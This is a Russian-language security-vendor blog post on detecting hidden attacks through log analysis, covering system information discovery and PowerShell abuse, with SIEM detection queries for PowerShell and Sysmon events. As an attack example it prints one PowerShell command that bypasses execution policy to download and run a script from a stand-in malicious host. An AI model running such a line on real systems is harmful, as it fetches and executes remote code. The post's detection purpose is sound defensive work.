Блог

Выявление скрытых атак: как анализ логов помогает обнаружить угрозы?

Редакция Cyber Media опубликовала статью о работе с логами в распределенных системах. Иван Трубченко, аналитик по информационной безопасности NGR Softlab, дал комментарий журналистам о том, как выявить скрытые угрозы с помощью анализа логов, а также более детально рассмотрел вопрос на нашем сайте.

Эффективное выявление скрытых атак, использующих легитимные инструменты, зависит от тщательного анализа логов. Давайте рассмотрим на примерах.

T1082 — System Information Discovery

Злоумышленники часто начинают атаки со сбора системной информации (T1082 — System Information Discovery) — это стандартный этап разведки. Они получают данные о версии ОС, имени хоста, сетевых настройках, установленных программах и пользовательских правах. Эта информация помогает планировать дальнейшие векторы атаки.

Этапы атаки:
1. Команды systeminfo, hostname, whoami дают базовую информацию.
2. Сканирование сети для сбора данных о доступных устройствах через команды arp, ipconfig /all.
3. Использование WMI-запросов для сбора сведений о программном обеспечении.

Для обнаружения такой активности, необходимо проводить мониторинг логов командной строки: отслеживание выполнения таких команд, как systeminfo, whoami, wmic. Также детектировать подозрительные действия помогут логи PowerShell, отслеживающие выполнение таких командлетов, как Get-ComputerInfo, Get-WmiObject.

T1059.001 — Command and Scripting Interpreter: PowerShell

PowerShell (T1059.001) — ещё один инструмент для автоматизации каких-либо процессов, используемый как ИТ-сотрудниками, так и злоумышленниками.

Этапы атаки:
1. Запуск команд: использование встроенных функций для выполнения кода Invoke-Expression;
2. Скачивание вредоносного ПО: использование Invoke-WebRequest или System.Net.WebClient для загрузки файлов.
3. Обход защиты: запуск с параметрами -NoProfile и -ExecutionPolicy Bypass для предотвращения ограничений.

Пример:
powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious-server.com/payload.ps1')".

Для обнаружения подобных действий необходим:

1. Мониторинг выполнения скриптов PowerShell.

Пример:
(source=WinEventLog:"Microsoft-Windows-PowerShell/Operational" EventID="4104" AND Image="powershell.exe" AND (CommandLine="-enc" OR CommandLine="-ep bypass" OR CommandLine="-noni*")
PowerShell Operational Log (ID 4103 — модульная загрузка, ID 4104 — выполнение скриптов)

2. Мониторинг логов создания процессов на уровне Sysmon и Microsoft Windows Audit.

Пример:
- Мониторинг науровне Sysmon и Microsoft Audit (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="wsmprovhost.exe" AND ParentImage="svchost.exe"

При этом надо обращать внимание на подозрительные процессы и используемые параметры командной строки. Анализ этих данных позволяет выявить попытки запуска скриптов, которые могут сигнализировать об аномальном поведении.

В целом, комплексный подход к мониторингу и анализу различных типов событий повышает вероятность обнаружения скрытых действий злоумышленников, даже если активность кажется легитимной.

Прочитать статью целиком можно на сайте издания Cyber Media.

2024-12-13 10:43